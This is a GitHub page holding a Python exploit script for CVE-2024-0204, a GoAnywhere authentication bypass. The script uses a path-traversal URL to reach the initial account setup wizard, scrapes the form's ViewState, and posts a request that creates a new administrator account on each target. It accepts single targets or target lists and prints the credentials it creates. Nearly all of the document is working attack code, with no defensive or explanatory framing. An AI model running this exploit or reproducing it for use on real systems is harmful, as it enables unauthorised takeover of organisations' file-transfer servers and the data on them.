-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-0204.py
110 lines (89 loc) · 4.38 KB
/
CVE-2024-0204.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import requests
from bs4 import BeautifulSoup
import argparse
import string
import random
from requests.packages.urllib3.exceptions import InsecureRequestWarning
class GoAnywhereExploit:
def __init__(self, endpoint, username, password):
self.endpoint = self.ensure_https(endpoint)
self.username = username
self.password = password
self.url = f"{self.endpoint}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
self.session = requests.session()
@staticmethod
def validate_password(password):
if len(password) < 8:
raise argparse.ArgumentTypeError("Password must be at least 8 characters long.")
return password
def check_vulnerability(self):
r = self.session.get(self.url, verify=False)
if r.status_code == 401:
raise Exception("Endpoint does not appear to be vulnerable. Check the provided endpoint.")
def extract_viewstate(self, response_text):
soup = BeautifulSoup(response_text, "html.parser")
input_field = soup.find('input', {'name': 'javax.faces.ViewState'})
if input_field is None:
raise Exception("Failed to extract ViewState. Check if the target page structure has changed.")
return input_field['value']
def create_admin_user(self, viewstate):
data = {
"j_id_u:creteAdminGrid:username": self.username,
"j_id_u:creteAdminGrid:password_hinput": self.password,
"j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
"j_id_u:creteAdminGrid:confirmPassword_hinput": self.password,
"j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
"j_id_u:creteAdminGrid:submitButton": "",
"createAdminForm_SUBMIT": 1,
'javax.faces.ViewState': viewstate
}
r = self.session.post(self.url, verify=False, data=data)
if r.status_code != 200:
print(f"Failed to create a new admin user for target {self.endpoint}. Status code: {r.status_code}")
return False
error_message = self.extract_error_message(r.text)
if error_message:
print(f"Error creating admin user for target {self.endpoint}: {error_message}")
return False
return True
def extract_error_message(self, response_text):
soup = BeautifulSoup(response_text, "html.parser")
error_message = soup.find("span", {"class": "ui-messages-error-summary"})
return error_message.text if error_message else None
def ensure_https(self, endpoint):
if not endpoint.startswith("https://"):
endpoint = "https://" + endpoint
return endpoint
def generate_random_string(length):
characters = string.ascii_letters + string.digits + string.punctuation
return ''.join(random.choice(characters) for _ in range(length))
def main():
try:
# Deaktiviere die "Unverified Insecure RequestWarning"
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
parser = argparse.ArgumentParser("CVE-2024-0204 GoAnywhere Authentication Bypass")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("--ip", help="Target IP or URL")
group.add_argument("--targets", help="File containing target IPs or URLs (one per line)")
args = parser.parse_args()
if args.ip:
targets = [args.ip]
elif args.targets:
with open(args.targets, 'r') as file:
targets = [line.strip() for line in file.readlines()]
for target in targets:
username = generate_random_string(10)
password = generate_random_string(12)
exploit = GoAnywhereExploit(target, username, password)
exploit.check_vulnerability()
viewstate = exploit.extract_viewstate(exploit.session.get(exploit.url, verify=False).text)
success = exploit.create_admin_user(viewstate)
if success:
print(f"Admin user created successfully for target: {target}")
print(f"Username: {username}")
print(f"Password: {password}")
print("------------------------")
except Exception as e:
print(f"Error: {str(e)}")
if __name__ == "__main__":
main()